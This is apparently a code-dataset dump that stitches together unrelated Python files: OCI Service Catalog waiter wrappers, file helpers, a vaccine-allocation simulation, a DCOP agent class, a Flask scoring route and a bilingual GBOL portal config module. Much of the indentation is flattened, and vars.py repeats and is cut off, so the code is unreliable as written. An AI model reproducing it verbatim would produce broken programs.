            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_private_application(private_application_id, update_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_service_catalog_and_wait_for_state(self, service_catalog_id, update_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
Details to update for a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_service_catalog(service_catalog_id, update_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
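A minimal usage sketch for the composite operations above. It assumes a standard SDK config file; the catalog OCID, the DELETED lifecycle state and the waiter timings are illustrative placeholders, not values taken from this module.

import oci

# Build the plain client and wrap it in the composite-operations helper.
config = oci.config.from_file()
client = oci.service_catalog.ServiceCatalogClient(config)
composite = oci.service_catalog.ServiceCatalogClientCompositeOperations(client)

# Delete a service catalog and block until it reaches a terminal state.
result = composite.delete_service_catalog_and_wait_for_state(
    service_catalog_id="ocid1.servicecatalog.oc1..example",          # placeholder OCID
    wait_for_states=["DELETED"],                                     # assumed lifecycle state
    waiter_kwargs={"max_interval_seconds": 10, "max_wait_seconds": 600},
)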
vision/_file_utils.py | BrianOfrim/boja | 7 | 9132 |
<filename>vision/_file_utils.py
from typing import List
import os
import re
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
return True
def get_files_from_dir(dir_path: str, file_type: str = None) -> List[str]:
if not os.path.isdir(dir_path):
return []
file_paths = [
f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))
]
if file_type is not None:
file_paths = [f for f in file_paths if f.lower().endswith(file_type.lower())]
return file_paths
def _int_string_sort(file_name) -> int:
match = re.match("[0-9]+", os.path.basename(file_name))
if not match:
return 0
return int(match[0])
def get_highest_numbered_file(
dir_path: str, file_type: str = None, filter_keyword=None
) -> str:
file_names = get_files_from_dir(dir_path)
if file_type is not None:
file_names = [
file_name
for file_name in file_names
if file_name.lower().endswith(file_type.lower())
]
if filter_keyword is not None:
file_names = [
file_name
for file_name in file_names
if filter_keyword.lower() in file_name.lower()
]
if len(file_names) == 0:
return None
highest_numbered_file = sorted(file_names, key=_int_string_sort, reverse=True)[0]
return os.path.join(dir_path, highest_numbered_file)
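A small sketch of how these helpers might fit together; the checkpoint directory and the file naming scheme below are made up for illustration.

# Hypothetical layout: model snapshots saved as "<step>_model.pt" in ./checkpoints
latest = get_highest_numbered_file("./checkpoints", file_type=".pt", filter_keyword="model")
if latest is None:
    create_output_dir("./checkpoints")
else:
    print("Resuming from", latest)
# _int_string_sort compares the leading integer, so "12_model.pt" outranks "9_model.pt",
# which a plain lexicographic sort would order the other way around.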
vaccine_allocation/epi_simulations.py | COVID-IWG/epimargin-studies | 0 | 9133 |
import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
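A toy check of the dose-prioritization logic defined above, using prioritize, MORTALITY and numpy from this module; the numbers are arbitrary.

# One simulation draw, seven age bins, ten doses allocated by mortality priority.
S_toy = np.array([[100, 80, 60, 40, 20, 10, 5]], dtype=float)
dV_toy = prioritize(10, S_toy, MORTALITY)
# The highest-priority (oldest) bins are filled first:
# dV_toy == [[0, 0, 0, 0, 0, 5, 5]] and dV_toy.sum() == 10
assert dV_toy.sum() == 10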
src/core/agent_state.py | nandofioretto/py_dcop | 4 | 9134 |
'''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
            self.variables_assignments[var_name] = self.agt_assignments_list[it][i]
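A rough sketch of driving the assignment iterator; the agent and variable classes below are stand-ins with the attributes AgentState expects (name, value, domain), not classes from this project.

class _Var:
    def __init__(self, name, value, domain):
        self.name, self.value, self.domain = name, value, domain

class _Agt:
    variables = [_Var("x1", 0, [0, 1]), _Var("x2", 0, [0, 1])]

state = AgentState("a1", _Agt())
while state.nextAssignment():           # enumerates all 2 x 2 joint assignments
    print(state.variables_assignments)  # {'x1': 0, 'x2': 0}, {'x1': 0, 'x2': 1}, ...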
johnny_cache/__init__.py | Sonictherocketman/cache-proxy | 3 | 9135 |
from .server import app  # noqa
|
python_packages_static/flopy/mf6/__init__.py | usgs/neversink_workflow | 351 | 9136 |
<gh_stars>100-1000
# imports
from . import coordinates
from . import data
from .modflow import *
from . import utils
from .data import mfdatascalar, mfdatalist, mfdataarray
from .mfmodel import MFModel
from .mfbase import ExtFileAction
|
tests/__init__.py | issuu/jmespath | 0 | 9137 |
<gh_stars>0
import sys
# The unittest module got a significant overhaul
# in 2.7, so if we're in 2.6 we can use the backported
# version unittest2.
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
import simplejson as json
from ordereddict import OrderedDict
else:
import unittest
import json
from collections import OrderedDict
src/routes/scoring.py | jtillman20/cfb-data-api | 0 | 9138 |
<filename>src/routes/scoring.py
from typing import Union
from flask import request
from flask_restful import Resource
from exceptions import InvalidRequestError
from models import Scoring
from utils import flask_response, rank, sort
class ScoringRoute(Resource):
@flask_response
def get(self, side_of_ball: str) -> Union[Scoring, list[Scoring]]:
"""
GET request to get scoring offense or defense for the given years.
If team is provided only get scoring data for that team.
Args:
side_of_ball (str): Offense or defense
Returns:
Union[Scoring, list[Scoring]]: Scoring data for all teams
or only scoring data for one team
"""
if side_of_ball not in ['offense', 'defense']:
raise InvalidRequestError(
"Side of ball must be either 'offense' or 'defense'")
sort_attr = request.args.get('sort', 'points_per_game')
secondary_attr, secondary_reverse = secondary_sort(
attr=sort_attr, side_of_ball=side_of_ball)
try:
start_year = int(request.args['start_year'])
except KeyError:
raise InvalidRequestError(
'Start year is a required query parameter')
except ValueError:
raise InvalidRequestError(
'Query parameter start year must be an integer')
end_year = request.args.get('end_year')
team = request.args.get('team')
if end_year is not None:
try:
end_year = int(end_year)
except ValueError:
raise InvalidRequestError(
'Query parameter end year must be an integer')
scoring = Scoring.get_scoring(
side_of_ball=side_of_ball,
start_year=start_year,
end_year=end_year,
team=team
)
if isinstance(scoring, Scoring):
return scoring
attrs = [secondary_attr, sort_attr]
reverses = [secondary_reverse, side_of_ball == 'offense']
scoring = sort(data=scoring, attrs=attrs, reverses=reverses)
return rank(data=scoring, attr=sort_attr)
def secondary_sort(attr: str, side_of_ball: str) -> tuple:
"""
Determine the secondary sort attribute and order when the
primary sort attribute has the same value.
Args:
attr (str): The primary sort attribute
side_of_ball (str): Offense or defense
Returns:
tuple: Secondary sort attribute and sort order
"""
if attr == 'points_per_game':
secondary_attr = 'games'
elif attr in ['points', 'relative_points_per_game']:
secondary_attr = 'points_per_game'
else:
secondary_attr = attr
return secondary_attr, side_of_ball == 'offense'
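A quick illustration of the tie-breaking helper above, calling secondary_sort directly; the boolean flag is the reverse-sort order applied to the secondary attribute.

# (secondary attribute, reverse flag) returned for a few inputs:
secondary_sort('points_per_game', 'offense')           # -> ('games', True)
secondary_sort('points', 'offense')                    # -> ('points_per_game', True)
secondary_sort('relative_points_per_game', 'defense')  # -> ('points_per_game', False)
secondary_sort('games', 'defense')                     # -> ('games', False)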
WebPortal/gbol_portal/vars.py | ZFMK/GermanBarcodeofLife | 0 | 9139 |
import configparser
import logging

log = logging.getLogger(__name__)
c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
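# The keys read above imply a minimal production.ini schema. The sketch below writes a
# skeleton file with placeholder values (illustrative only, not the project's real settings):
skeleton = configparser.ConfigParser()
skeleton['dboption'] = {'chost': 'localhost', 'cport': '5432', 'cuser': 'gbol',
                        'cpw': 'secret', 'cdb': 'gbol'}
skeleton['option'] = {'home': '/srv/gbol', 'hosturl': 'www.example.org',
                      'smtp-sender': 'noreply@example.org', 'smtp': 'mail.example.org',
                      'template_collection_sheet': 'template.xls',
                      'collection_table_ordered': 'ordered/', 'collection_table_filled': 'filled/',
                      'dwb_name_suffix': '_dwb', 'dwb_connection_string': '', 'use_dwb': '0',
                      'dev_group': 'dev@example.org'}
skeleton['news'] = {}
with open('production.example.ini', 'w') as fh:
    skeleton.write(fh)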
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
"Schleswig-Holstein",
"Thüringen"],
'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'Send mail was successful!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
'Benachichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
                                       'We have received Your registration for the taxonomic expertise {expertisename} and '
'have send them to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
                               'en': 'The password and further tips were sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
                          'en': 'An error occurred when uploading the collection sheet. Please send it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now login into the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages are send to the dev_group specified in production.ini
# Note: this reassignment replaces the simple messages['error'] strings defined further above.
messages['error'] = {}
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Trasaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| import configparser
c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
